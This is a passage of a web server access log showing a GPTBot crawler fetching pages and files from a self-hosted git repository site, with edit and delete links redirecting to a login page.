+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9965] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14584] [Gzip 9.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query" -[17/Feb/2026:17:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10247] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 11333] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" -[17/Feb/2026:17:14:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:17:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:17:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11517] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" -[17/Feb/2026:17:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11366] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" -[17/Feb/2026:17:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" -[17/Feb/2026:17:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11984] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" -[17/Feb/2026:17:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:17:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:17:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:17:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9940] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:17:14:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 9811] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 10386] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10124] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:17:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9952] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&state=all&type=all" -[17/Feb/2026:17:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&state=all&type=all" -[17/Feb/2026:17:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&state=all&type=all" -[17/Feb/2026:17:14:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/global.json" -[17/Feb/2026:17:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&state=all&type=all" -[17/Feb/2026:17:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec?display=source" [Client 74.7.227.38] [Length 12301] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" -[17/Feb/2026:17:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9948] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol" [Client 74.7.227.38] [Length 196533] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:17:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog" [Client 74.7.227.38] [Length 35430] [Gzip 7.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:17:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor" [Client 74.7.227.38] [Length 56772] [Gzip 12.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" -[17/Feb/2026:17:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 11183] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:17:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13324] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:17:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:17:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" -[17/Feb/2026:17:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" -[17/Feb/2026:17:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18219] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 21566] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9949] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 12560] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 12600] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 12560] [Gzip 3.69] 